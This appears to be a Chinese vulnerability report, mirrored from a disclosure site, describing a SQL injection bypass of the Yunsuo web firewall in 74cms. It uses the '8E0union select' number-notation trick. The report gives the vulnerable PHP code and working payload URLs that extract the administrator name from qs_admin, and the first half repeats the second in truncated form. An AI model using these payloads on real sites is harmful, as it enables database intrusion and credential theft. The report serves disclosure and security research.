VULHUB ™

### 简要描述： 这次来个实例 ### 详细说明： @疯狗 感谢提示，参考zone http://zone.wooyun.org/content/16772 id=8E0union select ...这种方式 和id=8.0union select ... ### 漏洞证明： 本地搭建74cms web环境并把云锁所有防护打开。 [<img src="https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg" alt="yy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg) 下面注入点是把对应intval去掉后测试的 include/fun_wap.php ``` function company_one($id) { global $db; $wheresql=" WHERE id=".$id;//这里 $sql = "select * from ".table('company_profile').$wheresql." LIMIT 1"; $val=$db->getone($sql); return $val; } ``` 还有全局的gpc过滤也关闭 /include/common.inc.php ``` if (!empty($_GET)) { }//这里是GET型注入，把addslashes去掉 if (!empty($_POST)) { $_POST = addslashes_deep($_POST); } ``` 1.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#...

### 简要描述： 这次来个实例 ### 详细说明： @疯狗 感谢提示，参考zone http://zone.wooyun.org/content/16772 id=8E0union select ...这种方式 和id=8.0union select ... ### 漏洞证明： 本地搭建74cms web环境并把云锁所有防护打开。 [<img src="https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg" alt="yy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg) 下面注入点是把对应intval去掉后测试的 include/fun_wap.php ``` function company_one($id) { global $db; $wheresql=" WHERE id=".$id;//这里 $sql = "select * from ".table('company_profile').$wheresql." LIMIT 1"; $val=$db->getone($sql); return $val; } ``` 还有全局的gpc过滤也关闭 /include/common.inc.php ``` if (!empty($_GET)) { }//这里是GET型注入，把addslashes去掉 if (!empty($_POST)) { $_POST = addslashes_deep($_POST); } ``` 1.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# 出来各种注入点了： [<img src="https://images.seebug.org/upload/201412/3112234173f2208ffc1128f100e380e115618e89.jpg" alt="yy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3112234173f2208ffc1128f100e380e115618e89.jpg) 2.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin# 管理员账户名出来了： [<img src="https://images.seebug.org/upload/201412/31122615c3489148d5accc617238c5a0f7234ebb.jpg" alt="yy1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31122615c3489148d5accc617238c5a0f7234ebb.jpg) 管理员密码： [<img src="https://images.seebug.org/upload/201412/3112263201d3dac77edfb511b37be9cebf4b3441.jpg" alt="yy2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3112263201d3dac77edfb511b37be9cebf4b3441.jpg)